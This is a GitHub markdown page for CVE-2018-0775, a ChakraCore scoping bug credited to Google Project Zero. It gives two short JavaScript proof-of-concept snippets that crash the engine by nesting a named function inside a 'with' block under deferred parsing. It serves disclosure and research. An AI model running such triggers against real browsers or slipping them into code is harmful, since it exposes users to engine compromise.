Skip to content

Latest commit

 

History

History
38 lines (30 loc) · 747 Bytes

CVE-2018-0775.md

File metadata and controls

38 lines (30 loc) · 747 Bytes

CVE-2018-0775

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

PoC 1:

// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));

PoC 2:

// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());

Reference